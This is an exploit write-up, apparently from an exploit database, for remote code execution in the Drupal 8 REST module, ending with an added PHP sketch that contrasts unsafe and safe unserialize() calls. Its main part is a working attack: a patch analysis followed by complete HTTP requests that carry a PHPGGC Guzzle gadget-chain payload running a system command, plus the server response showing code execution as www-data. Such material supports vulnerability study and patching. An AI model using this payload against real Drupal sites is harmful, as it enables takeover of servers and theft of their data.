[EXP]Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution
Analyzing the patch
By diffing Drupal 8.6. and 8.6., we can see that in the REST module, FieldItemNormalizer now uses a new trait, SerializedColumnNormalizerTrait. This trait provides the checkForSerializedStrings() method, which in short raises an exception if a string is provided for a value that is stored as a serialized string. This indicates the exploitation vector fairly clearly: through a REST request, the attacker needs to send a serialized property. This property will later be unserialize()d, which can easily be exploited using tools such as PHPGGC.

Another modified file gives indications as to which property can be used: LinkItem now uses unserialize($values['options'], ['allowed_classes' => FALSE]); instead of the standard unserialize($values['options']);. As for all FieldItemBase subclasses, LinkItem references a property type. Shortcut uses this property type, for a property named link.

Triggering the unserialize()
Having all these elements in mind, triggering an unserialize is fairly easy:

GET /drupal-8.6./node/?_format=hal_json HTTP/1.1
Host: 192.168.1.25
Content-Type: application/hal+json
Content-Length:

{
"link": [
{
"value": "link",
"options": "<SERIALIZED_CONTENT>"
}
],
"_links": {
"type": {
"href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default"
}
}
}
Since Drupal uses Guzzle, we can generate a payload using PHPGGC:

$ ./phpggc guzzle/rce1 system id --json
"O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
We can now send the payload via GET:

GET /drupal-8.6./node/?_format=hal_json HTTP/1.1
Host: 192.168.1.25
Content-Type: application/hal+json
Content-Length:

{
"link": [
{
"value": "link",
"options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
}
],
"_links": {
"type": {
"href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default"
}
}
}
To which Drupal responds:

HTTP/1.1 OK
Link: <...>
X-Generator: Drupal (https://www.drupal.org)
X-Drupal-Cache: MISS
Connection: close
Content-Type: application/hal+json
Content-Length:

{...}uid=(www-data) gid=(www-data) groups=(www-data)
Note: Drupal caches responses: if you're in a testing environment, clear the cache. If not, try another node ID.
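
The two changes described under "Analyzing the patch", as an added example that is not Drupal's code or the original author's: it contrasts plain unserialize() with the allowed_classes form and sketches the normalizer-side rejection of strings. AuditProbe, load_options_unsafe(), load_options_safe() and reject_serialized_string() are hypothetical names, and the serialized string is constructed sample input.

```php
<?php
// Added illustration: every name here is hypothetical, none is Drupal code.

// Stand-in for a gadget class: destroying an instance has a side effect.
class AuditProbe {
    public static $log = [];
    public $tag = 'default';
    public function __destruct() {
        self::$log[] = "destructor ran for {$this->tag}";
    }
}

// Pre-patch pattern: any loadable class named in the string is instantiated.
function load_options_unsafe(string $stored) {
    return unserialize($stored);
}

// Post-patch pattern quoted above: objects are never instantiated.
function load_options_safe(string $stored) {
    return unserialize($stored, ['allowed_classes' => FALSE]);
}

// Sketch of the normalizer-side rule: a property stored in serialized form
// must arrive as structured data, never as a client-supplied string.
function reject_serialized_string(string $property, $value): void {
    if (is_string($value)) {
        throw new InvalidArgumentException(
            "Property '$property' is stored serialized; a string is not accepted.");
    }
}

// Constructed sample input, standing in for a client-supplied "options" value.
$stored = 'O:10:"AuditProbe":1:{s:3:"tag";s:6:"sample";}';

$obj = load_options_unsafe($stored);
unset($obj);                       // the destructor runs on attacker-chosen state
printf("unsafe: %d destructor call(s)\n", count(AuditProbe::$log));

$safe = load_options_safe($stored);
printf("safe:   got %s\n", get_class($safe));
unset($safe);                      // placeholder object, no AuditProbe code runs
printf("safe:   %d destructor call(s)\n", count(AuditProbe::$log));

try {
    reject_serialized_string('options', $stored);
} catch (InvalidArgumentException $e) {
    printf("normalizer: %s\n", $e->getMessage());
}
reject_serialized_string('options', ['attributes' => ['target' => '_blank']]);
```

With allowed_classes set to FALSE the object comes back as a __PHP_Incomplete_Class placeholder, so none of the named class's magic methods can run; the string check stops the value before it is ever stored.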